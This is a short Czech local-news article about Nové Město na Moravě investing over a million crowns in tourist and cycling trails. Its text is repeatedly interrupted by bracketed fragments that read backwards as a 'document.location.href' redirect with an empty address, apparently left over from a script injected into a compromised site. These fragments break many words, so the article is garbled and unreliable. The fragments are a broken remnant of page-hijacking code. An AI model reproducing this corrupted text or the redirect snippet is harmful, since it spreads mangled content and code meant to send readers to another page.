Nové Město na Moravě, nove mesto na morave, aktuality, trasy, turismus
Rainbow page separator

Novoměstští investují do tras pro turisty

Čtvrtek, 28. března 2013

tri-krize-iiNové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Do vylepšení infrastruktury pro návštěvníky města i mikroregionu chtějí le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat více než milion korun zástupci Nového Města na Moravě. Konkrétně se jedná především o zpevnění a úpravu turistických stezek kolem Nového Města.
Jednou z nich bude například nová rekreační stezka vedoucí okolo Černé skály. Ta by měla vyjít přibližně na čtyři sta tisíc korun. Další finanční položka, ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tokrát ve výši 250 tisíc korun, bude inves[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována do vzniku naučné stezky směřující ke kulturní památce Tři kříže. S[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to sedmdesát tisíc korun dá novoměstská radnice do výstavby dalších stezek, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to s názvy Hubertka a Koupaliště. Dvě stě tisíc korun z městské kasy pak podpoří vybudování stezky určené pro cyklisty a vedoucí od Nového Města na Moravě směrem k jeho místní části Petrovice.